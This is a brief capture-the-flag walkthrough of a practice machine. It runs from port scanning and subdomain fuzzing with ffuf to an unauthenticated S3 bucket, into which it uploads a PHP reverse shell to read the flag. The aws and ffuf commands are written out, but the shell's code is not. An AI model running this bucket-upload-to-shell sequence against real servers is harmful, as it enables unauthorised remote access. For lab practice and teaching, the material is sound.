Port enumeration

Using nmap I can see 2 open ports, 22 and 80. b8b5adeb2153c702064a85e0fd024bed.png

DNS configuration

In the page, Im able to find the web page domain. 4cc3b1bf344369d54c8cdecb98b74adc.png So, using /etc/hosts I configure the domain. f2d687d7b221f5249b98a9ae26330e45.png

Web enumeration

Using ffuf I found a subdomain s3.

ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top100000.txt -u http://thetoppers.html -H "Host: FUZZ.thetoppers.htb" -fc 200 -mc 200,301,302,307,401,403,500,404

17577d98c584deff8e596320ecac65e8.png In the web, it gives me a json with the server status. d9b646c8f145035732343154655bbf5f.png

AWS explotation

This subdomain is typical of aws, so, I use the aws client tool to list the buckets.

aws s3 ls --endpoint-url http://s3.thetoppers.htb --no-sign-request

041374021b9911b87857d4f358f725b5.png Now I list the files in this bucket.

aws s3 ls s3://thetoppers.htb --endpoint-url http://s3.thetoppers.htb --no-sign-request

9cbb2af4a6a0e70d98a2af3131c48020.png Now, I can load a php reverse shell in the bucket.

aws s3 cp rev.php s3://thetoppers.htb --endpoint-url http://s3.thetoppers.htb --no-sign-request

8bb5ae691c092e75141ce4123669f41c.png With this shell, I can read the flag. 75e7c54f41f8fa836afa7f3782f1f176.png